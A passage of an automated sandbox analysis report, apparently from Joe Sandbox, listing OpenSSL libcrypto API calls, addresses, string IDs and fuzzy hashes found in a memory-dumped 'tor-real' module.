                                                                            • API ID: L_sk_freeL_sk_num$L_sk_deleteL_sk_dupL_sk_set_cmp_funcL_sk_sortL_sk_value
                                                                            • String ID:
                                                                            • API String ID: 1089248418-0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: H_freeHparamsM_read_bio_O_ctrlO_freeO_newO_s_file
                                                                            • String ID: l
                                                                            • API String ID: 2896938982-2517025534
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0E936C
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E93CA
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0E93E9
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E940C
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E9428
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E944B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Digest$Final_exInit_ex$UpdateX_new
                                                                            • String ID:
                                                                            • API String ID: 3873810720-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0E6823
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0E6837
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6841
                                                                            • EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6852
                                                                            • X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E688C
                                                                            • X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E68BD
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0E69A0
                                                                              • Part of subcall function 6C0E67A0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6601
                                                                              • Part of subcall function 6C0E67A0: EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6616
                                                                              • Part of subcall function 6C0E67A0: X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E6657
                                                                              • Part of subcall function 6C0E67A0: X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E668B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: L_sk_valueX509_get0_pubkeyX509_get_extension_flagsX509_get_signature_infoY_security_bits$L_sk_num
                                                                            • String ID:
                                                                            • API String ID: 3955210016-0
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A879F
                                                                            • OPENSSL_sk_insert.LIBCRYPTO-1_1 ref: 6C0A87B2
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A87BA
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A87C6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A87DA
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A87EC
                                                                            • OPENSSL_sk_sort.LIBCRYPTO-1_1 ref: 6C0A87F6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A8801
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: L_sk_free$L_sk_dupL_sk_insertL_sk_numL_sk_set_cmp_funcL_sk_sortL_sk_value
                                                                            • String ID:
                                                                            • API String ID: 1412518800-0
                                                                            APIs
                                                                            • ASYNC_get_current_job.LIBCRYPTO-1_1 ref: 6C0B0160
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B01CA
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0200
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: R_put_error$C_get_current_job
                                                                            • String ID:
                                                                            • API String ID: 2484768174-0
                                                                            APIs
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0E866E
                                                                            • EVP_CIPHER_CTX_reset.LIBCRYPTO-1_1 ref: 6C0E86B0
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0E88C0
                                                                            • memcpy.MSVCRT ref: 6C0E8A18
                                                                              • Part of subcall function 6C0E74F0: EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0E7558
                                                                              • Part of subcall function 6C0E74F0: OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0E75B7
                                                                              • Part of subcall function 6C0B6E60: strlen.MSVCRT ref: 6C0B6E8E
                                                                              • Part of subcall function 6C0B6E60: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0B6EBC
                                                                              • Part of subcall function 6C0B6E60: strcpy.MSVCRT ref: 6C0B6EDE
                                                                              • Part of subcall function 6C0B6E60: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0B6FB1
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E70C1
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E711F
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0E8B4F
                                                                            • memcpy.MSVCRT ref: 6C0E8BCD
                                                                            • memcpy.MSVCRT ref: 6C0E8C45
                                                                            • memcpy.MSVCRT ref: 6C0E8CB8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: memcpy$D_sizeL_cleanse$O_clear_freeO_mallocX_freeX_newX_new_idX_resetstrcpystrlen
                                                                            • String ID: @$c ap traffic$s ap traffic$s hs traffic
                                                                            • API String ID: 163817395-2594031039
                                                                            • Opcode ID: d9ab6f8a0f685c8a1fbd025b39e5690e4239af86c40056581bb125e01b15e30b
                                                                            • Instruction ID: e19d7c0c452dde23b5319b79d618e5eb8ce9669f044b0ab836c4dde0d57fa812
                                                                            • Opcode Fuzzy Hash: d9ab6f8a0f685c8a1fbd025b39e5690e4239af86c40056581bb125e01b15e30b
                                                                            • Instruction Fuzzy Hash: 9051F2B1A493418FD710CF19C18075AFBF4BF89308F108A2EE8A89B751D775E948CB82
                                                                            APIs
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0EA503
                                                                            • BN_bin2bn.LIBCRYPTO-1_1 ref: 6C0EA525
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0EA53B
                                                                            • SRP_Calc_A.LIBCRYPTO-1_1 ref: 6C0EA55D
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0EA582
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Calc_D_priv_bytesL_cleanseN_bin2bn__stack_chk_fail
                                                                            • String ID: 0
                                                                            • API String ID: 2775472007-4108050209
                                                                            • Opcode ID: 04285996cdd2946838c9c294d11322ac614df5aecff54db07d1d8ccf592c7ca8
                                                                            • Instruction ID: b6dc5fada43ef4ba00bc5279ba30dd8a0cbf305df6b0749f13cc2ade1de34ea8
                                                                            • Opcode Fuzzy Hash: 04285996cdd2946838c9c294d11322ac614df5aecff54db07d1d8ccf592c7ca8
                                                                            • Instruction Fuzzy Hash: ED1119B16153018FCB00DF24C590B9ABBF6BF8C304F558879E8889B705EB35E945CB92
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A1BE3
                                                                            • EC_KEY_get0_group.LIBCRYPTO-1_1 ref: 6C0A20D9
                                                                            • EC_GROUP_get_curve_name.LIBCRYPTO-1_1 ref: 6C0A20E9
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A242B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$P_get_curve_nameY_get0_group
                                                                            • String ID: C$|
                                                                            • API String ID: 374196510-633747002
                                                                            • Opcode ID: 9f511d799bdbe9940e966f747423552bb80e64d3ab504ec739c007837ae0b845
                                                                            • Instruction ID: 4c2ba6e25e04ac64cd2fd97d835a5acc1700a20ad07b6808e022189078f0fb22
                                                                            • Opcode Fuzzy Hash: 9f511d799bdbe9940e966f747423552bb80e64d3ab504ec739c007837ae0b845
                                                                            • Instruction Fuzzy Hash: C50129B140C306DEEB009FA1C44435EBBE0BF84358F418C1CE4E99B650E7B9E58A8F96
                                                                            APIs
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E2CBD
                                                                            • EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0E2CCF
                                                                            • EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0E2CF3
                                                                            • EVP_PKEY_get0_EC_KEY.LIBCRYPTO-1_1 ref: 6C0E2D02
                                                                            • EC_KEY_get0_group.LIBCRYPTO-1_1 ref: 6C0E2D0E
                                                                            • EC_GROUP_get_curve_name.LIBCRYPTO-1_1 ref: 6C0E2D16
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_id$P_get_curve_nameX509_get0_pubkeyY_get0_Y_get0_group
                                                                            • String ID:
                                                                            • API String ID: 2011593283-0
                                                                            • Opcode ID: 1abed27240420eb9c95855186b893ac5f5101c2598028926b22e90738cfbe8b1
                                                                            • Instruction ID: 99361686b39824959dba594eaca2037fee16c6394f36a5e5496d61bbebf2cd3e
                                                                            • Opcode Fuzzy Hash: 1abed27240420eb9c95855186b893ac5f5101c2598028926b22e90738cfbe8b1
                                                                            • Instruction Fuzzy Hash: 0021A5716897068EEF146E35C98836AB6E4EF4C348FA54D3ECA66CBB50E734D4818781
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $D$O$P
                                                                            • API String ID: 0-1359717048
                                                                            • Opcode ID: 12ef805f4fd3e3a8fbf69dec707f5f3c020b223d09f019ac73b3991479adce2d
                                                                            • Instruction ID: c27139c740fa8c4552c64a518d2692dfa25bdcbb2463fb7f39cc9822563b2fcc
                                                                            • Opcode Fuzzy Hash: 12ef805f4fd3e3a8fbf69dec707f5f3c020b223d09f019ac73b3991479adce2d
                                                                            • Instruction Fuzzy Hash: 22715A702093018FE700CF25C4A479ABBF5AF85308F56CA6DE8988F655DB75E489CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$FileO_ctrl
                                                                            • String ID: -
                                                                            • API String ID: 3793654131-2547889144
                                                                            • Opcode ID: d2444f0f269fa82f8d14a39c893cbe950b1a5123387eb8e84b834a8119abb115
                                                                            • Instruction ID: 8ec8bd78176dd78c1bd0f8e5dd9f0cef0a8df536142a365a4d29725a9e839505
                                                                            • Opcode Fuzzy Hash: d2444f0f269fa82f8d14a39c893cbe950b1a5123387eb8e84b834a8119abb115
                                                                            • Instruction Fuzzy Hash: 724128B1A083059FCB40EF29C48439ABBE5FF84304F45C86DEC989B715DB34A509DBA2
                                                                            APIs
                                                                            • i2d_X509.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0D5F23), ref: 6C0D4643
                                                                              • Part of subcall function 6C094670: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • i2d_X509.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C0D5F23), ref: 6C0D467D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509i2d_$O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 215832503-307317852
                                                                            • Opcode ID: 08562dfcf4a150688db6c8f7d30c01a3ce85fbdca7e8d1870027717bd1813348
                                                                            • Instruction ID: 1339019ce7e2e6ccb45927fc7dff6f433f395b6f66b3ab68e1529028d8a22220
                                                                            • Opcode Fuzzy Hash: 08562dfcf4a150688db6c8f7d30c01a3ce85fbdca7e8d1870027717bd1813348
                                                                            • Instruction Fuzzy Hash: 6331F7B0608301AFD300DF69D48075EBBE8BB89758F51892DF58887750D774E9889F93
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_sizeL_cleansememcpy
                                                                            • String ID: @
                                                                            • API String ID: 2940768226-2766056989
                                                                            • Opcode ID: 1c350a979343a6ee1cf87a6a83d38af7332df2c5642b55fb657df3a858322425
                                                                            • Instruction ID: 1318593b5c710ba1f000eae02ecd084b042441faf9f8fb67397c1c6d90657bf8
                                                                            • Opcode Fuzzy Hash: 1c350a979343a6ee1cf87a6a83d38af7332df2c5642b55fb657df3a858322425
                                                                            • Instruction Fuzzy Hash: E03124B16097058FC710DF29C08079ABBF4BF88348F41896DE8989B305D736AA49CF92
                                                                            APIs
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0ED1
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E1007
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E102F
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C0E1067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_ctrl$CipherInit_exR_flags
                                                                            • String ID: D$P
                                                                            • API String ID: 635281127-307317852
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8934
                                                                            • EVP_MD_CTX_copy_ex.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8953
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_copy_exX_new
                                                                            • String ID: D$P$c
                                                                            • API String ID: 1626106133-3524198723
                                                                            APIs
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0A089B
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0A08B1
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0A08F5
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0950
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Init_exO_ctrlUpdateX_new
                                                                            • String ID: D$P
                                                                            • API String ID: 2441367972-307317852
                                                                            APIs
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A2055
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A208D
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A22AB
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A22E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$L_sk_new_nullL_sk_push
                                                                            • String ID: A
                                                                            • API String ID: 1049000911-3554254475
                                                                            APIs
                                                                            • X509_STORE_CTX_init.LIBCRYPTO-1_1 ref: 6C0A6B71
                                                                            • X509_STORE_CTX_set_flags.LIBCRYPTO-1_1 ref: 6C0A6B93
                                                                            • X509_verify_cert.LIBCRYPTO-1_1 ref: 6C0A6B9B
                                                                            • X509_STORE_CTX_get1_chain.LIBCRYPTO-1_1 ref: 6C0A6BB1
                                                                            • OPENSSL_sk_shift.LIBCRYPTO-1_1 ref: 6C0A6BBD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6BC5
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_CTX_new.LIBCRYPTO-1_1 ref: 6C0A6C73
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6CAD
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_freeL_sk_numL_sk_pop_freeL_sk_shiftR_put_errorX509_freeX509_verify_certX_freeX_get1_chainX_initX_newX_set_flags
                                                                            • String ID: A
                                                                            • API String ID: 809722490-3554254475
                                                                            APIs
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A68FF
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A691F
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_set_cmp_funcO_freeR_put_errorR_readX509_free__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 4221723611-3554254475
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8934
                                                                            • EVP_MD_CTX_copy_ex.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8953
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorX_copy_exX_new
                                                                            • String ID: D$P$j
                                                                            • API String ID: 2487396258-63814154
                                                                            APIs
                                                                            • EVP_PKEY_cmp.LIBCRYPTO-1_1 ref: 6C0B8A51
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8ACA
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B8B13
                                                                            • EVP_PKEY_missing_parameters.LIBCRYPTO-1_1 ref: 6C0B8C40
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B8C58
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorY_cmpY_copy_parametersY_freeY_missing_parameters
                                                                            • String ID:
                                                                            • API String ID: 3141684548-0
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A6BF7
                                                                              • Part of subcall function 6C0E67A0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6601
                                                                              • Part of subcall function 6C0E67A0: EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6616
                                                                              • Part of subcall function 6C0E67A0: X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E6657
                                                                              • Part of subcall function 6C0E67A0: X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E668B
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6E81
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_pop_freeX509_$E_freeL_sk_numL_sk_valueR_put_errorX509_get0_pubkeyX509_get_extension_flagsX509_get_signature_infoX_freeY_security_bits
                                                                            • String ID:
                                                                            • API String ID: 75647108-0
                                                                            • Opcode ID: 89e106c4e059398572617d16a03ec47e93e17b7283351664169101b2275ad626
                                                                            • Instruction ID: 5abe34edaa50c3be35bfdddb0395f6eb2769e27cc157c25a2ff56512041d804e
                                                                            • Opcode Fuzzy Hash: 89e106c4e059398572617d16a03ec47e93e17b7283351664169101b2275ad626
                                                                            • Instruction Fuzzy Hash: F611E5B1A493009FC700AFA9C08035EFBF0BB88758F518D2DE898C7701D775E8458B82
                                                                            APIs
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A647E
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6486
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A649E
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A64B8
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A64D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                            • String ID:
                                                                            • API String ID: 2231116090-0
                                                                            • Opcode ID: d2edc8daeda3f4dd722285b17c10e7b147b40cc55a06d1bea8b1ccf4cdd5353b
                                                                            • Instruction ID: 2ae2268c4e48f6e7653c3cd81071b4ad8ecf1cf74f2728196741b043f14e69df
                                                                            • Opcode Fuzzy Hash: d2edc8daeda3f4dd722285b17c10e7b147b40cc55a06d1bea8b1ccf4cdd5353b
                                                                            • Instruction Fuzzy Hash: D20125B19097414FDB10AFB9A58079BBBF4BF48218F110C2DE595D7701E734E886CB81
                                                                            APIs
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A650E
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6516
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A652E
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A6548
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A6567
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                            • String ID:
                                                                            • API String ID: 2231116090-0
                                                                            • Opcode ID: 60384431fce171f9aa7aba0ba418e5281f5e348e3646d36aa3482e33ac7a654a
                                                                            • Instruction ID: 1345fc720736015ac99d2a67b3056415f59654c6a3ecc6e2cd58e551d4e9dec4
                                                                            • Opcode Fuzzy Hash: 60384431fce171f9aa7aba0ba418e5281f5e348e3646d36aa3482e33ac7a654a
                                                                            • Instruction Fuzzy Hash: 1B0175B1A097014FDB50AFB9A4C479BBBF0AF08218F16482CE4D9C7705E730E886CB41
                                                                            APIs
                                                                            • PEM_read_bio_X509.LIBCRYPTO-1_1 ref: 6C0A681F
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A6833
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A683F
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1 ref: 6C0A6851
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A685D
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A686F
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A687F
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A691F
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_free$E_dupL_sk_findL_sk_pushL_sk_set_cmp_funcM_read_bio_O_freeR_readX509X509_freeX509_get_subject_name__stack_chk_fail
                                                                            • String ID:
                                                                            • API String ID: 2222204369-0
                                                                            • Opcode ID: e196b57b13a76c28dd59f7503b2af24c71797f143e8526b8a662a7bc0547a7c7
                                                                            • Instruction ID: 1a615b736c96f758c0418a961a3271cf20ea7857cb4b92a8164e8738e93ace40
